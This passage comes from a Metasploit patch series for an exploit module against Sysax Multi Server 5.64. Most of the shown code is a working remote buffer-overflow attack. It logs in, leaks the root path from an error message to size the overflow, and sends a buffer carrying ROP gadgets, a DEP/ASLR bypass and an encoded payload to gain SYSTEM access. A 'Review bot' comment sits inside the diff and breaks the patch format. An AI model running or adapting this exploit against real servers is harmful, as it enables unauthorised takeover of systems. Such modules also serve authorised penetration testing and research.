0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] + ].flatten.pack("V*") + end - creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" + return rop_gadgets - # Login to get SID value - r = send_request_cgi({ - 'method' => "POST", - 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", - 'data' => creds - }) + end - # Parse response for SID token - sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] - print_status "SID: #{sid.to_s}" + def get_sid - sid.to_s - - end + user = datastore['SysaxUSER'] + pass = datastore['SysaxPASS'] - def get_root_path(sid) + creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - # Find the path because it's used to help calculate the offset - random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir + # Login to get SID value + r = send_request_cgi({ + 'method' => "POST", + 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", + 'data' => creds + }) - r = send_request_cgi({ - 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", - 'method' => 'POST', - }) + # Parse response for SID token + sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] + print_status "SID: #{sid.to_s}" - # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. 
- # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) - root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] - print_status "Root Dir: #{root_path}" + sid.to_s - root_path + end - end + def get_root_path(sid) - def exploit + # Find the path because it's used to help calculate the offset + random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - connect + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", + 'method' => 'POST', + }) - sid = get_sid - root_path = get_root_path(sid) + # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. + # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) + root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] + print_status "Root Dir: #{root_path}" - buffer = rand_text(target['Offset']-root_path.length) - buffer << [target.ret].pack('V') + root_path - if (target['Rop']) - buffer << [target['Nop']].pack('V')*16 - buffer << create_rop_chain() - end + end - buffer << make_nops(15) - buffer << payload.encoded + def exploit - post_data = Rex::MIME::Message.new - post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") - post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" + connect - r = send_request_cgi({ - 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", - 'method' => 'POST', - 'data' => post_data.to_s, - 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", - }) + sid = get_sid + root_path = get_root_path(sid) - disconnect + buffer = rand_text(target['Offset']-root_path.length) + buffer << [target.ret].pack('V') - end + if (target['Rop']) + buffer << [target['Nop']].pack('V')*16 + buffer << create_rop_chain() + end + + buffer << make_nops(15) + buffer << payload.encoded + + post_data = 
Rex::MIME::Message.new + post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") + post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" + + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + + disconnect + + end end - From 3da8a59cf025d2b3d091be9911aa6c2821477128 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 20 Aug 2012 22:42:54 +0200 Subject: [PATCH 5/5] a little cleanup plus complete metadata --- .../windows/http/sysax_create_folder.rb | 27 +++++++++---------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index a07189e478..9ad9bbdbae 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit 
@@ -20,14 +16,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. + This module exploits a stack buffer overflow in the create folder function in + Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the + vulnerability valid credentials with the create folder permission must be provided. + The HTTP option must be enabled on Sysax too. - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token, find the root folder, - and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM - access. This exploit works on XP SP3, and Server 2003 SP1-SP2. + This module will log into the server, get a SID token, find the root folder, and + then proceed to exploit the server. Successful exploits result in SYSTEM access. + This exploit works on XP SP3, and Server 2003 SP1-SP2. }, 'License' => MSF_LICENSE, 'Author' => @@ -36,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + [ 'EDB', '20676' ], [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], ], 'DefaultOptions' => @@ -52,14 +49,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ - [ 'Windows XP SP3', + [ 'Windows XP SP3 / Sysax Multi Server 5.64', { 'Rop' => false, 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] 'Offset' => 711, } ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + [ 'Windows 2003 SP1-SP2 / Sysax Multi Server 5.64', { 'Rop' => true, 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) 
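Review bot: The reworded description still omits that the module depends on a second server behavior: the root directory is recovered from the `invalid path:` error message returned by the `transferpage2` page, which the earlier commit message in this series says was fixed in 5.67. A sentence such as "The module also relies on Sysax disclosing the user's root path in an error message (fixed in 5.67) to compute the overflow offset" would tell users why the module is pinned to 5.64 even though the overflow itself was fixed in 5.66. The rest of the metadata changes (EDB reference, target names) look consistent with the module body.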
@@ -68,8 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote } ], ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', + 'Privileged' => true, + 'DisclosureDate'=> 'Jul 29 2012', 'DefaultTarget' => 0)) register_options(